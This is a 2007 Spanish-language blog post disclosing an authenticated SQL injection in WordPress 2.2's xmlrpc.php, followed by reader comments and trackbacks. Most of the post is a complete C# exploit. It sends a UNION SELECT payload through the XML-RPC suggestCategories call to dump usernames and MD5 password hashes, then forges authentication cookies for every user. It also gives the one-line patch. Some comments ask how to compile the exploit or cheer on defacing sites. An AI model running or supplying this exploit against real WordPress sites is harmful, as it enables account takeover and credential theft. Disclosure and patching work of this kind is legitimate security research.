SQL Injection en Wordpress 2.2 + exploit incluido
Por: alex | 28 Mayo 2007 | Ver comentarios |
Como comentaba en una entrada anterior, la versión 2.2 y la versión en desarrollo de este CMS también son vulnerables a SQL Injection, aunque es más limitado que el anterior por requerir de un usuario válido.
El error, bastante tonto por cierto, se encuentra en la función wp_suggestCategories, en el archivo xmlrpc.php:
function wp_suggestCategories($args) {
global $wpdb;
$this->escape($args);
$blog_id = (int) $args[0];
$username = $args[1];
$password = $args[2];
$category = $args[3];
$max_results = $args[4];
if(!$this->login_pass_ok($username, $password)) {
return($this->error);
}
// Only set a limit if one was provided.
$limit = "";
if(!empty($max_results)) {
$limit = "LIMIT {$max_results}";
}
$category_suggestions = $wpdb->get_results("
SELECT cat_ID category_id,
cat_name category_name
FROM {$wpdb->categories}
WHERE cat_name LIKE '{$category}%'
{$limit}
");
return($category_suggestions);
}Como se puede observar en la porción de código, no se hace una conversión a entero del valor de $max_results, por lo que es posible enviar valores del tipo 0 UNION ALL SELECT user_login, user_pass FROM wp_users. Para que un atacante logre su objetivo, es necesario que éste tenga una cuenta de usuario válida (una cuenta de tipo suscriber basta y sobra) en el sitio víctima.
Preparé un pequeño exploit que devuelve la lista de usuarios con sus respectivas contraseñas en MD5, además también incluye las cookies de autenticación para cada usuario.
using System;
using System.Net;
using System.Text;
using System.Xml;
using System.Text.RegularExpressions;
using System.Security.Cryptography;
class Program
{
static void Main(string[] args)
{
string targetUrl = "http://localhost/wp/";
string login = "alex";
string password = "1234";
string data = @"<methodCall>
<methodName>wp.suggestCategories</methodName>
<params>
<param><value>1</value></param>
<param><value>{0}</value></param>
<param><value>{1}</value></param>
<param><value>1</value></param>
<param><value>0 UNION ALL SELECT user_login, user_pass FROM {2}users</value></param>
</params>
</methodCall>";
string cookieHash = GetCookieHash(targetUrl);
using (WebClient request = new WebClient())
{
/* Probar con el prefijo por omisión */
string response = request.UploadString(targetUrl + "xmlrpc.php",
string.Format(data, login, password, "wp_svn_"));
/* Se hace una nueva petición si la consulta anterior falla */
Match match = Regex.Match(response, @"FROM\s+(.*?)categories\s+");
if (match.Success)
{
response = request.UploadString(targetUrl + "xmlrpc.php",
string.Format(data, login, password, match.Groups[1].Value));
}
try
{
XmlDocument doc = new XmlDocument();
doc.LoadXml(response);
XmlNodeList nodes = doc.SelectNodes("//struct/member/value");
if (nodes != null && doc.SelectSingleNode("/methodResponse/fault") == null)
{
string user, pass;
/* Mostrar lista de:
* Usuario md5(contraseña)
* Cookie de Autenticación
*
*/
for (int i = 0; i < nodes.Count / 2 + 1; i += 2)
{
user = nodes.Item(i).InnerText;
pass = nodes.Item(i + 1).InnerText;
Console.WriteLine("Usuario: {0}\tMD5(Contraseña): {1}",
user,
pass);
Console.WriteLine("Cookie: wordpressuser_{0}={1};wordpresspass_{0}={2}\n",
cookieHash,
user,
MD5(pass));
}
}
else
{
Console.WriteLine("Error:\n{0}", response);
}
}
catch (Exception ex)
{
Console.WriteLine("Error:\n" + ex.ToString());
}
}
}
private static string GetCookieHash(string targetUrl)
{
WebRequest request = WebRequest.Create(targetUrl + "wp-login.php?action=logout");
request.Method = "HEAD";
(request as HttpWebRequest).AllowAutoRedirect = false;
WebResponse response = request.GetResponse();
if (response != null)
{
Match match = Regex.Match(response.Headers["Set-Cookie"],
@"wordpress[a-z]+_([a-z\d]{32})",
RegexOptions.IgnoreCase);
if (match.Success)
return match.Groups[1].Value;
}
return string.Empty;
}
public static string MD5(string password)
{
MD5CryptoServiceProvider x = new MD5CryptoServiceProvider();
byte[] bs = Encoding.UTF8.GetBytes(password);
bs = x.ComputeHash(bs);
StringBuilder s = new StringBuilder();
foreach (byte b in bs)
{
s.Append(b.ToString("x2").ToLower());
}
return s.ToString();
}
}Para corregir este problema, mientras liberan actualizaciones para Wordpress 2.2, es editar el archivo xmlrpc.php y cambiar la línea $max_results = $args[4]; de la función wp_suggestCategories por $max_results = (int) $args[4]; o en su defecto bloquear el acceso a xmlrpc.php. 
Actualización: Pueden aplicar el parche oficial (es lo mismo que sugerí)
g30rg3_x
28 de Mayo de 2007, 02:15:53 am
jejejeje si acabo de recien leer en el trac el parche y de claro ya ponerlo en mi blog…
Saludos
Otro fallo de seguridad en Wordpress 2.2 | aNieto2K
28 de Mayo de 2007, 04:21:09 pm
[…] en BuayaCorp que han detectado otro fallo de seguridad en Wordpress 2.2 en forma de posible inyección SQL. El fallo es relativamente leve ya que requiere autentificación […]
RoQ
28 de Mayo de 2007, 04:42:50 pm
Y Mullenweg cuando te contrata???
Corregir errores de seguridad en Wordpress 2.2 - Carrero Bitácora de los Hermanos Carrero, David Carrero Fernández-Baillo y Jaime Carrero Fernández-Baillo.
28 de Mayo de 2007, 05:22:02 pm
[…] información sobre las vulnerabilidades a traves de XSS y SQL […]
Wordpress 2.2, en la mira de las SQL Injection « Alex Seo
28 de Mayo de 2007, 05:51:54 pm
[…] de Wordpress se encuentra bajo una terrible vulnerabilidad de SQL Injection. Fue descubierta por Alexander Concha y se encuentra arreglada para la versión 2.2.1 de […]
Alex
28 de Mayo de 2007, 05:54:37 pm
Pana, mis respetos
Excelente el exploit y también haber descubierto un bug que seguramente no lo hubiesen encontrado sino dentro de mucho tiempo
alex
28 de Mayo de 2007, 06:32:53 pm
@Roq: jeje, dudo mucho que llegue a contratar a alguien como yo
@Alex: Gracias por el comentario.
Wordpress 2.2 Security Alert SQL Injection Exploit
28 de Mayo de 2007, 09:30:03 pm
[…] been found for wordpress 2.2. Currently no patch or release is available. You can see the proof of concept here. This has been fixed in the trac you can see it here. It requires you to change only one line of […]
Mejorando la seguridad de Wordpress en castellano
29 de Mayo de 2007, 03:07:25 am
[…] los (por desgracia cada vez más habituales) fallos de seguridad de este popular CMS. Por ejemplo este o este. El segundo es el de los hermanos Carrero que, aparte de realizar unas buenas y puntuales […]
BloggingTom
29 de Mayo de 2007, 05:59:24 am
Wordpress und die Sicherheit…
Rein gefühlsmässig hat die Anzahl der Updates und Upgrades von Wordpress in den letzten Monaten, nicht zuletzt durch diverse Sicherheitslücken, ziemlich zugenommen. Dass auf Sicherheitslücken rasch reagiert wird, ist nicht nur löblich sondern auc…
Puppet Master's living room
29 de Mayo de 2007, 08:32:29 am
Sicherheit bei Wordpress…
Wieder ist ein Sicherheitsleck in Wordpress bekannt geworden. Es betrifft die Datei xmlrpc.php
Auf Zeile 541 ist folgender Code zu lesen.
$max_results = $args[4];
Diese Zeile ermöglicht es die Tabelle wp_users auszulesen. Beheben kann man dies in…
oceangray.net | Wordpress 2.2 de açık - SQL Injection Exploit
29 de Mayo de 2007, 02:32:01 pm
[…] ile takip ettiğim sitelerden birinde wordpress’in 2.2 sürümünde saptanan bir açıktan bahsedilmişti.. Açık xmlrpc.php dosyasındaki wp_suggestCategories fonksiyonunun altında yer alan $max_results = […]
Semana muy movida para WordPress | La WeB de DragoN
30 de Mayo de 2007, 01:09:30 am
[…] SQL Injection apareció el cual alex de buyacorp documento amplia mente e incluso publico un código en csharp para explotar dicho fallo si usas wordpress te recomiendo bajes este paquete de actualizacion creado por alexseo.com el cual […]
Actualizaciones de seguridad para Wordpress 2.2 | gEEK tHE pLANET
30 de Mayo de 2007, 10:20:43 am
[…] Gracias a DragoN me he enterado de esta importante actualización para wordpress, para nadie es extraño que esta última versión ha salido muy defectuosa, en un principio se vio el problema con los widgets, luego en buyacorp nos muestran una vulnerabilidad del tipo SQL Injection (con exploit incluido en C#). […]
Actualizaciones de seguridad para Wordpress 2.2 | gEEK tHE pLANET
30 de Mayo de 2007, 10:31:26 am
[…] Este no ha sido un buen comienzo para la nueva versión de Wordpress 2.2 gracias a DragoN me he enterado de esta actualización, primero se encontraron cierto fallos con los widgets, luego en buayacorp nos muestran una vulnerabilidad del tipo SQL Injection (con exploit incluido). […]
BlogSecurity » WordPress 2.2 Vulnerability
30 de Mayo de 2007, 11:45:28 am
[…] Alexander Concha sent us an email today discussing a vulnerability he has just released for WordPress 2.2. […]
BlogSecurity » WordPress BlogWatch
30 de Mayo de 2007, 11:47:17 am
[…] xmlrpc.php authenticated SQL Injection (more) […]
ericsk’s blog » WordPress 2.2 安全漏洞
31 de Mayo de 2007, 03:55:26 am
[…] 從蔡依林學長那裡看到的消息,雖然這個安全漏洞只會在有一個以上 subscriber level 以上的帳號才有影響,不過官方很快就提出解決之道: […]
修补WordPress2.2的sql注入漏洞 at catch the digital flow
31 de Mayo de 2007, 05:18:57 am
[…] 有人找到了WordPress2.2(包含之前版本)的一个sql注入漏洞, 很快官方就给出了修补的方法. 在WordPress根目录下找到xmlrpc.php这个文件, 把第537行的: $max_results = $args[4]; […]
WordPress 2.2 再爆新弱點 | 憂藍夢境‧部落格
31 de Mayo de 2007, 07:35:36 am
[…] 2.13 版時有人發現滿嚴重的 admin-ajax.php 漏洞,但是到了 2.2 版還是又被人抓到洞了= =” 如果您的 WP 擁有一個 Subscriber […]
blechBlog
31 de Mayo de 2007, 08:36:56 am
Sicherheitslücke in Wordpress 2.2…
Eine Sicherheitslücke, die sich wahrscheinlich nicht nur in der aktuellen Wordpress-Version wiederfindet, ermöglicht einen Angriff via SQL-Injection, durch den sich offensichtlich auch die Userdaten auslesen lassen.
Betroffen ist die Datei xmlr…
23byte » WordPress got owned...
31 de Mayo de 2007, 06:28:40 pm
[…] mal wieder. Gibt wohl ‘ne SQL-Injection in WordPress 2.2. Siehe hier für mehr Informationen und einen Proof-of-Conzept. Stellt sich mir nur die Frage… warum zur […]
Wordpress 2.2 Vulnerable a XSS y SQL Injection
2 de Junio de 2007, 12:46:36 pm
[…] atras Alex publicaba en su blog BuayaCorp un articulo avisando de una vulnerabilidad en Wordpress 2.2, la ultima disponible. Las misma trata […]
Saber é Bom Demais!! » Blog Archive » Fui vítima de um hacker
4 de Junio de 2007, 10:29:27 am
[…] Gecko/20070515 Firefox/2.0.0.4″ Supõe-se que ele tenha utilizado um exploit. Dá uma olhada aqui e aqui. Melhor eu colocar “minhas barbas” de […]
Wordpress 2.2: nuova release, nuova vulnerabilità | Daniele Salamina’s Blog
4 de Junio de 2007, 12:14:38 pm
[…] Grazie ad Agerry per la segnalazione. Post su Blogsecurity. Exploit. […]
PauloDuarte.org » Arqueologia » Falha do WordPress 2.2 permite código malicioso
4 de Junio de 2007, 02:10:17 pm
[…] artigo (espanhol) e este (inglês) explicam a existência de uma falha no Wordpress 2.2 que permite […]
fuxion
4 de Junio de 2007, 04:55:14 pm
Como compilo tu exploit?
alex
4 de Junio de 2007, 05:27:12 pm
Puedes usar Visual Studio 2005, Visual C# Express o el compilador de línea de comandos (no probé si compila con mono), en todos los casos necesitas tener instalado el .NET Framework 2.0
Saludos
WaLhEZ
5 de Junio de 2007, 02:45:02 pm
Esto si que es serio, asi que esas paginas que piden que nos sucribamos seran defaceadas, bien excelente descubrimiento, gracias por el dato.
Múltiples vulnerabilidades en la última version estable de Wordpress MU - Buayacorp
6 de Junio de 2007, 03:38:00 am
[…] un rato el código de la última versión estable de Wordpress MU, veo que el casi inofensivo** problema de seguridad que reporté el lunes pasado en Wordpress, tiene consecuencias más peligrosas en la versión […]
minosh blog » Blog Archive » Inyeccion SQL en Wordpress 2.2
7 de Junio de 2007, 09:50:29 am
[…] el lanzamiento de wordpress, una vulnerabilidad en su version actual (2.2) ah sido encontrada por Alexander Concha, en su blog comenta sobre la vulnerabilidad, que permite realizar una inyeccion sql, por un error […]
gedex’s blog » Upgrading Wordpress and old bug issue
8 de Junio de 2007, 11:38:07 am
[…] 2.2 (xmlrpc.php) Remote SQL Injection Exploit by Alexander Concha. Actually I’ve not tested this exploit yet. OK here what is as explained from alex […]
NightAngel » Blog Archive » WordPress... deux failles et une astuce
11 de Junio de 2007, 05:34:59 pm
[…] faille découverte par Alexander Concha créée un risque d’injection […]
g30rg3 Blog
12 de Junio de 2007, 10:56:05 pm
Mas y Mas Bugs de WordPress…
Cuando las aguas parecían tranquilas salen nuevas vulnerabilidades…
Una de ellas la cual fue descubierta por Waraxe solo afecta a la rama 2.1.x y menores.
Y la otra apenas salio hace unos pocos días a cargo de los famosos ha.ckers.org y que afe…
Maltray
14 de Junio de 2007, 01:52:05 pm
WTF!!!!!!
Nos invaden los Elites!!!
http://milw0rm.com/exploits/4039
Wordpress 2.2 Security Alert SQL Injection Exploit | Joomt
18 de Junio de 2007, 09:21:25 am
[…] been found for wordpress 2.2. Currently no patch or release is available. You can see the proof of concept here. This has been fixed in the trac you can see it here. It requires you to change only one line of […]
XSS, SQL Injection, Arbitrary File Upload en Wordpress - Buayacorp
21 de Junio de 2007, 09:12:15 am
[…] los dos problemas de seguridad que reporté previamente en Wordpress 2.2, se suman otros cuatro que en su mayoría afectan a aquellos blogs que […]
Jonathan
8 de Agosto de 2007, 07:46:37 pm
Oigan, estoy empezando con esto, jajajaja nunca creí diria eso, pero bueno, estoy haciendo pruebas en un servidor propio, mi peguta es como puedo copilar el exploit aqui expuesto, osease donde copio y pego y ejecuto este exploit, les agradesco a todos.
Cookies de autenticación y contraseñas más seguras en WordPress en Buayacorp - Diseño y Programación
17 de Diciembre de 2007, 01:52:30 pm
[…] y de seguro reducirán la acción de ciertos problemas de seguridad que se basaban sólo en obtener el hash […]